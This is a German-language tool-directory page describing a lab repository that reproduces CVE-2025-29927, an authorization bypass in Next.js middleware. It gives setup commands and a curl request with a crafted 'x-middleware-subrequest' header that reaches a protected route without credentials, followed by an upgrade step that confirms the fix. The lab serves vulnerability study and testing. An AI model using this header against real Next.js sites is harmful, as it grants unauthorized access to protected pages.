Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
SchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungLabs & Praxis
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

Reproduktionslabor für CVE-2025-29927 — Next.js Middleware Autorisierungsumgehung (CVSS 9.1)

Repository anzeigen
42vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29927 Labor

Minimales Reproduktions-Labor für CVE-2025-29927 — Next.js Middleware-Autorisierungsumgehung (CVSS 9.1).

Begleitmaterial zu: N-Day-Analyse auf Medium

Was dies ist

Eine Next.js 15.2.2-App (angreifbar) mit einer cookie-geschützten /dashboard-Route. Die Middleware-Authentifizierungsprüfung kann durch Senden eines einzigen HTTP-Headers umgangen werden — keine Anmeldedaten erforderlich.

Voraussetzungen

  • Node.js 18+

Einrichtung

root@kitploit:~
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

Umgehung reproduzieren

Schritt 1 — Bestätigen, dass die Middleware nicht authentifizierte Anfragen blockiert:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

Schritt 2 — Middleware mit dem Subrequest-Header umgehen:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

Schritt 3 — Auf die gepatchte Version aktualisieren und bestätigen, dass die Umgehung blockiert ist:

root@kitploit:~
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

App-Routen

RouteZugriff
/Öffentlich
/loginÖffentlich
/dashboardDurch Middleware geschützt (erfordert session-Cookie)

Betroffene Versionen

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

Referenzen

  • NVD — CVE-2025-29927
  • Next.js Patch-PR #77201
  • Verwundbare Quelle — sandbox.ts
Tool herunterladen